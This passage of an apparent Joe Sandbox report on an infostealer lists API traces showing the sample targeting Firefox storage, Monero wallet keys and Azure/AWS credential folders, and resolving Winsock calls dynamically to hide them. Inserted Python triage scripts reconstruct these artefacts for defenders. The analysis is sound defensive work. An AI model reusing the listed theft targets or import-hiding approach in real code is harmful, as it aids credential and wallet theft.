                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F0E
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1F42
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C1F4D
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C1F58
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1F75
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C1F81
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1FAC
                                    • lstrlen.KERNEL32(?), ref: 008C1FE4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2004
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C2012
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2039
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008C204B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C206B
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008C2077
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C209D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008C20A8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C20D4
                                    • lstrlen.KERNEL32(?), ref: 008C20EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C210A
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C2118
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2142
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C217F
                                    • lstrlen.KERNEL32(0053D118), ref: 008C218D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C21B1
                                    • lstrcat.KERNEL32(00000000,0053D118), ref: 008C21B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C21F7
                                    • lstrcat.KERNEL32(00000000), ref: 008C2204
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C222D
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008C2256
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C2282
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C22BF
                                    • DeleteFileA.KERNEL32(00000000), ref: 008C22F7
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008C2344
                                    • FindClose.KERNEL32(00000000), ref: 008C2353
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                    • String ID:
                                    • API String ID: 2857443207-0
                                    • Opcode ID: e81542951b8c32d15e860f470705729595821335c9db557f756ce8d542a17663
                                    • Instruction ID: c74f75319a081c7ad4b656a942b4c84861656abf036458c2c4bbb936408e6e4f
                                    • Opcode Fuzzy Hash: e81542951b8c32d15e860f470705729595821335c9db557f756ce8d542a17663
                                    • Instruction Fuzzy Hash: 0AE1F771A1161A9BCB10EBB8C989FAE7BB9FF44300F044169B905E7291DF34DD16CBA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D68D5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D6910
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008D693A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6971
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6996
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D699E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D69C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID: \..\
                                    • API String ID: 2938889746-4220915743
                                    • Opcode ID: ee818ae41ba39ef76789b8254d3346525a9e1ac770515e49d1fbdb9ed0090cd8
                                    • Instruction ID: ee4f12ac6a53e6753e58f703d35e9d08cb7e49aa6b73c88f1b4e94270df0b228
                                    • Opcode Fuzzy Hash: ee818ae41ba39ef76789b8254d3346525a9e1ac770515e49d1fbdb9ed0090cd8
                                    • Instruction Fuzzy Hash: 3AF15F70A016199BDB21EFB8D849FAE7BB5FF44300F04422AA855D7391EB34DD16CB92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4753
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4786
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D47AE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D47B9
                                    • lstrlen.KERNEL32(\storage\default\), ref: 008D47C4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D47E1
                                    • lstrcat.KERNEL32(00000000,\storage\default\), ref: 008D47ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4816
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4821
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4848
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4887
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D488F
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D489A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D48B7
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D48C3
                                    • lstrlen.KERNEL32(.metadata-v2), ref: 008D48CE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D48EB
                                    • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 008D48F7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D491E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4950
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008D4957
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D49B1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D49DA
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4A03
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4A2B
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4A5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                    • String ID: .metadata-v2$\storage\default\
                                    • API String ID: 1033685851-762053450
                                    • Opcode ID: 726ac099dc77ddb1570f1d3764a39dafe3d2c33178c9a2fc1737e45fd57dda19
                                    • Instruction ID: eff33cc35267dfea0001b0a14fcd76e11a606f89b6e227c76db5ee7dba63b23d
                                    • Opcode Fuzzy Hash: 726ac099dc77ddb1570f1d3764a39dafe3d2c33178c9a2fc1737e45fd57dda19
                                    • Instruction Fuzzy Hash: 58B1F631A0165A9BCB20ABB8C949E6F7BB8FF44700F141229B845E73A1DF34DD168792
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5C15
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008D5C44
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C75
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C9D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5CA8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5CD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5D08
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5D13
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5D38
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5D6E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5D96
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5DA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5DC8
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D5DDA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5DF9
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D5E05
                                    • lstrlen.KERNEL32(0053D0D0), ref: 008D5E14
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5E37
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D5E42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5E6C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D5E98
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008D5E9F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5EF7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5F66
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5F98
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D5FDB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6007
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D603F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D60B1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D60D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2428362635-0
                                    • Opcode ID: 9b0b1532f217479b5b7498bac7fabfc06958dda74de582a1ae3d1099cad8042d
                                    • Instruction ID: ae9e9968342a49965d1c49c4557294a9f5fc9e544d805a6397fff871d704651b
                                    • Opcode Fuzzy Hash: 9b0b1532f217479b5b7498bac7fabfc06958dda74de582a1ae3d1099cad8042d
                                    • Instruction Fuzzy Hash: 65023971A01A159BCB21EFA8C889FAE7BB9FF44300F14462AE845E7391DB34DD45CB91
                                    APIs
                                      • Part of subcall function 008C1000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C1015
                                      • Part of subcall function 008C1000: RtlAllocateHeap.NTDLL(00000000), ref: 008C101C
                                      • Part of subcall function 008C1000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008C1039
                                      • Part of subcall function 008C1000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008C1053
                                      • Part of subcall function 008C1000: RegCloseKey.ADVAPI32(?), ref: 008C105D
                                    • lstrcat.KERNEL32(?,00000000), ref: 008C10A0
                                    • lstrlen.KERNEL32(?), ref: 008C10AD
                                    • lstrcat.KERNEL32(?,.keys), ref: 008C10C8
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C10FF
                                    • lstrlen.KERNEL32(00538F88), ref: 008C110D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1131
                                    • lstrcat.KERNEL32(00000000,00538F88), ref: 008C1139
                                    • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 008C1144
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1168
                                    • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 008C1174
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C119A
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C11DF
                                    • lstrlen.KERNEL32(0053D118), ref: 008C11EE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1215
                                    • lstrcat.KERNEL32(00000000,?), ref: 008C121D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C1258
                                    • lstrcat.KERNEL32(00000000), ref: 008C1265
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C128C
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008C12B5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C12E1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C131D
                                      • Part of subcall function 008DEF30: lstrcpy.KERNEL32(00000000,?), ref: 008DEF62
                                    • DeleteFileA.KERNEL32(?), ref: 008C1351
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                    • String ID: .keys$\Monero\wallet.keys
                                    • API String ID: 2881711868-3586502688
                                    • Opcode ID: 471eeab0efccf64eb53ceb7640ff7ed004b45e3488ec15ff76947fd8d7923246
                                    • Instruction ID: f8befc3837c043bc743774294b40fbbf4989029cc25fbb65cf1385c464be93a0
                                    • Opcode Fuzzy Hash: 471eeab0efccf64eb53ceb7640ff7ed004b45e3488ec15ff76947fd8d7923246
                                    • Instruction Fuzzy Hash: 37A11871A116059BCB10EBB8DC89FAE7BB9FF45300F444128B905E7292DF34DD168BA1
                                    APIs
                                    • memset.MSVCRT ref: 008DE8A1
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008DE8CE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE900
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE90C
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 008DE923
                                    • memset.MSVCRT ref: 008DE961
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008DE98C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE9C0
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE9CC
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 008DE9E3
                                    • memset.MSVCRT ref: 008DEA21
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008DEA51
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DEA82
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DEA8E
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008DEAA5
                                    • memset.MSVCRT ref: 008DEAE3
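The API traces of the three path-building functions above (the Firefox profile walker that appends \storage\default\ and .metadata-v2, the Monero routine that reads wallet_path from HKCU\SOFTWARE\monero-project\monero-core and copies the .keys file, and the routine that resolves \.azure\, \.aws\ and \.IdentityService\ under the user profile) can be turned into a host triage list mechanically. The Python below is an added example written for this page, not Joe Sandbox or Stealc code. It parses trace lines in the format shown above, resolves the CSIDL argument of SHGetFolderPathA (0x1A is CSIDL_APPDATA, 0x1C is CSIDL_LOCAL_APPDATA, 0x28 is CSIDL_PROFILE) and the hive handle of RegOpenKeyExA (0x80000001 is HKEY_CURRENT_USER), and lists the literal components the sample concatenates together with the file operations it performs on the result. The sample trace lines embedded in the block are copied from the entries above; the artefact kinds and the "<caller-supplied path>" placeholder are this example's own convention. Pointer-valued arguments such as 008F1D5C are string literals the sandbox did not resolve, so the reconstructed paths are a lower bound on what the sample touches.

```python
"""Reconstruct host artefacts from Joe Sandbox-style API trace lines.

Added example for this report (not Joe Sandbox or Stealc code). The sample
traces below are copied from the function entries in the report; the
artefact kinds and the "<caller-supplied path>" placeholder are this
example's own convention.
"""
import re
from typing import List, Optional, Tuple

# CSIDL values seen as the 2nd argument of SHGetFolderPathA (shlobj.h),
# mapped to the environment variable a responder would expand on the host.
CSIDL_TO_ENV = {
    0x1A: "%APPDATA%",       # CSIDL_APPDATA
    0x1C: "%LOCALAPPDATA%",  # CSIDL_LOCAL_APPDATA
    0x28: "%USERPROFILE%",   # CSIDL_PROFILE
}
# Predefined hive handles seen as the 1st argument of RegOpenKeyExA (winreg.h).
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}

# "api.MODULE(arg,arg,...), ref: 008DXXXX"; search() skips the
# "Part of subcall function ...:" prefix the report puts on inlined callees.
CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

Artefact = Tuple[str, str]  # (kind, value); kind is "path", "name", "registry" or "fileop"


def parse_call(line: str) -> Optional[Tuple[str, List[str], str]]:
    """Return (api, args, ref) for one trace line, or None for lines with no call
    signature (e.g. 'memset.MSVCRT ref: 008DE8A1', logged without arguments)."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return m.group("api"), args, m.group("ref")


def literal(arg: str) -> Optional[str]:
    """A trace argument is a resolved string literal unless it is '?' (unknown) or an
    8-hex-digit number. Pointer-valued arguments such as 008F1D5C are literals the
    sandbox could not resolve, so components built from them are absent from the output."""
    if arg == "?" or HEX8.match(arg):
        return None
    return arg


def extract_artefacts(trace: str) -> List[Artefact]:
    """Walk one function's API trace and list what the code reaches for on the host."""
    out: List[Artefact] = []
    # A function with no SHGetFolderPathA of its own gets an already-built directory from its caller.
    root = "<caller-supplied path>"
    pending_key: Optional[str] = None

    for line in trace.splitlines():
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, args, _ref = parsed
        if api == "SHGetFolderPathA" and len(args) >= 2 and HEX8.match(args[1]):
            csidl = int(args[1], 16)
            root = CSIDL_TO_ENV.get(csidl, f"<CSIDL 0x{csidl:02X}>")
        elif api in ("lstrcat", "lstrcpy") and len(args) >= 2:
            lit = literal(args[1])
            if lit is None:
                continue
            # A component starting with '\' hangs off the current root; anything else
            # (an extension or file name) is appended to a path the trace does not resolve.
            out.append(("path", root + lit) if lit.startswith("\\") else ("name", lit))
        elif api == "RegOpenKeyExA" and len(args) >= 2:
            hive = HIVES.get(int(args[0], 16), args[0]) if HEX8.match(args[0]) else args[0]
            pending_key = f"{hive}\\{args[1]}"
        elif api == "RegQueryValueExA" and len(args) >= 2 and pending_key is not None:
            out.append(("registry", f"{pending_key}\\{args[1]}"))
            pending_key = None
        elif api in ("GetFileAttributesA", "FindFirstFileA", "CopyFileA", "DeleteFileA"):
            out.append(("fileop", api))
    return out


# Sample input: trace lines copied from the report's function entries.
FIREFOX_TRACE = r"""
• lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4753
• lstrcpy.KERNEL32(00000000,?), ref: 008D47AE
• lstrlen.KERNEL32(\storage\default\), ref: 008D47C4
• lstrcat.KERNEL32(00000000,\storage\default\), ref: 008D47ED
• lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D48C3
• lstrcat.KERNEL32(00000000,.metadata-v2), ref: 008D48F7
• GetFileAttributesA.KERNEL32(00000000), ref: 008D4957
"""
MONERO_TRACE = r"""
  • Part of subcall function 008C1000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008C1039
  • Part of subcall function 008C1000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008C1053
  • Part of subcall function 008C1000: RegCloseKey.ADVAPI32(?), ref: 008C105D
• lstrcat.KERNEL32(?,.keys), ref: 008C10C8
• lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 008C1174
• CopyFileA.KERNEL32(?,?,00000001), ref: 008C12B5
• DeleteFileA.KERNEL32(?), ref: 008C1351
"""
CLOUD_TRACE = r"""
• memset.MSVCRT ref: 008DE8A1
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008DE8CE
• lstrcpy.KERNEL32(00000000,?), ref: 008DE900
• lstrcat.KERNEL32(?,00000000), ref: 008DE90C
• lstrcat.KERNEL32(?,\.azure\), ref: 008DE923
• SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008DE98C
• lstrcat.KERNEL32(?,\.aws\), ref: 008DE9E3
• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008DEA51
• lstrcat.KERNEL32(?,\.IdentityService\), ref: 008DEAA5
"""

if __name__ == "__main__":
    for name, trace in (("firefox", FIREFOX_TRACE), ("monero", MONERO_TRACE), ("cloud", CLOUD_TRACE)):
        for kind, value in extract_artefacts(trace):
            print(f"{name:8} {kind:9} {value}")
```

Two constants in the traces are worth reading alongside the output: the access mask 00020119 passed to RegOpenKeyExA is KEY_READ | KEY_WOW64_64KEY, and the final argument 00000001 to CopyFileA is bFailIfExists = TRUE, so the sample does not overwrite a staging copy that already exists before it deletes the original with DeleteFileA.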
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$memset$FolderPathlstrcpy
                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 4067350539-3645552435
                                    • Opcode ID: 8c1e5ce29b1b4ec079c46f8c3301cbc6e80ec08584f30f9c02e940d88421968c
                                    • Instruction ID: 0a1ab11d7ade7d7f54d0a13a73f7df4c480e3d91393e4895a02d6351b3c123fa
                                    • Opcode Fuzzy Hash: 8c1e5ce29b1b4ec079c46f8c3301cbc6e80ec08584f30f9c02e940d88421968c
                                    • Instruction Fuzzy Hash: 4C61C131600744ABD720EBB4CC46FEA7BA4FF88700F408928B694CA2C1DE74D9098797
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E182F
                                    • lstrlen.KERNEL32(005272F8), ref: 008E1840
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1867
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1872
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E18A1
                                    • lstrlen.KERNEL32(008F5568), ref: 008E18B3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E18D4
                                    • lstrcat.KERNEL32(00000000,008F5568), ref: 008E18E0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E190F
                                    • lstrlen.KERNEL32(00527308), ref: 008E1925
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E194C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1957
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1986
                                    • lstrlen.KERNEL32(008F5568), ref: 008E1998
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E19B9
                                    • lstrcat.KERNEL32(00000000,008F5568), ref: 008E19C5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E19F4
                                    • lstrlen.KERNEL32(00527328), ref: 008E1A0A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A31
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1A3C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A6B
                                    • lstrlen.KERNEL32(00527358), ref: 008E1A81
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1AA8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1AB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1AE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen
                                    • String ID: (sR$XsR
                                    • API String ID: 1049500425-1658001101
                                    • Opcode ID: 9c02b80d0026b779b6a685ae0e4d2e992931105ad4c7ab131406ba90737fd2a2
                                    • Instruction ID: 635283fffb7ca2f18fcda827a2c86983eabff8beec34631450f1c85da7ea6928
                                    • Opcode Fuzzy Hash: 9c02b80d0026b779b6a685ae0e4d2e992931105ad4c7ab131406ba90737fd2a2
                                    • Instruction Fuzzy Hash: F191E8B16016429BDB20EFFACC98E2BBAF9FF05340B144939A995C7261DF34D845CB60
                                    APIs
                                    • lstrcpy.KERNEL32 ref: 008DAC2F
                                    • lstrlen.KERNEL32(0053E088), ref: 008DAC45
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAC6D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DAC78
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DACA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DACE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DACEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAD17
                                    • lstrlen.KERNEL32(008F509C), ref: 008DAD31
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAD53
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008DAD5F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAD88
                                    • lstrlen.KERNEL32(008F509C), ref: 008DAD9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DADBC
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008DADC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DADF1
                                    • lstrlen.KERNEL32(0053E1D8), ref: 008DAE07
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAE2F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DAE3A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAE63
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DAE9F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DAEA9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAECF
                                    • lstrlen.KERNEL32(00000000), ref: 008DAEE5
                                    • lstrcpy.KERNEL32(00000000,0053E160), ref: 008DAF18
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen
                                    • String ID: `S
                                    • API String ID: 2762123234-3154622632
                                    • Opcode ID: e14d34a729661de01fca2b4185fcb87ffeee13f1aeae81ac0c40a3df192233e5
                                    • Instruction ID: 1ada25e7be45ff0f9e30b9614ec98736011ee304951947055c31284d0e512094
                                    • Opcode Fuzzy Hash: e14d34a729661de01fca2b4185fcb87ffeee13f1aeae81ac0c40a3df192233e5
                                    • Instruction Fuzzy Hash: 51B10531911A169BCB25EBA8C849FAF7BBAFF40301F140629A814D63A1DF74DD15CB92
                                    APIs
                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,008D7741), ref: 008E4806
                                    • GetProcAddress.KERNEL32(00000000,connect), ref: 008E481C
                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 008E482D
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 008E483E
                                    • GetProcAddress.KERNEL32(00000000,htons), ref: 008E484F
                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 008E4860
                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 008E4871
                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 008E4882
                                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 008E4893
                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 008E48A4
                                    • GetProcAddress.KERNEL32(00000000,send), ref: 008E48B5
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                    • API String ID: 2238633743-3087812094
                                    • Opcode ID: 99645add7170f20309a10cc6c61c56db0bffa94980d2f0360aa7868c6058b695
                                    • Instruction ID: 2e3470ce709ce2ece7db9de03b40f0aeb0b332ee16b33f1f8b786ea13bebbb98
                                    • Opcode Fuzzy Hash: 99645add7170f20309a10cc6c61c56db0bffa94980d2f0360aa7868c6058b695
                                    • Instruction Fuzzy Hash: C1113672952724EB8710EBF4EC4DA7A7AB8FA09B06315091AB361D2264DFBC8442DF54
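The function above carries no static import for Winsock: it loads ws2_32.dll with LoadLibraryA and resolves connect, WSAStartup, getaddrinfo, htons, WSACleanup, recv, socket, freeaddrinfo, closesocket and send by name through GetProcAddress, so the import table of the unpacked binary does not show its raw-socket capability. The script below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses the "APIs" lines of this report format (bullets, argument lists with nested parentheses, calls without an argument list, and "Part of subcall function" prefixes) and rebuilds the hidden import list by pairing each GetProcAddress name with the most recent LoadLibrary* call by call-site address. The input lines are copied from this page; the pairing-by-address heuristic is an assumption that holds when the resolver is one linear function, as here.

```python
import re
from collections import Counter, defaultdict

# Constructed input: "APIs" lines copied from the Joe Sandbox listings on this page
# (the ws2_32 resolver plus single calls from three other functions) so the parser
# sees bullets, nested parentheses inside arguments, a call with no argument list
# and a "Part of subcall function" prefix.
SAMPLE_LINES = """\
• LoadLibraryA.KERNEL32(ws2_32.dll,?,008D7741), ref: 008E4806
• GetProcAddress.KERNEL32(00000000,connect), ref: 008E481C
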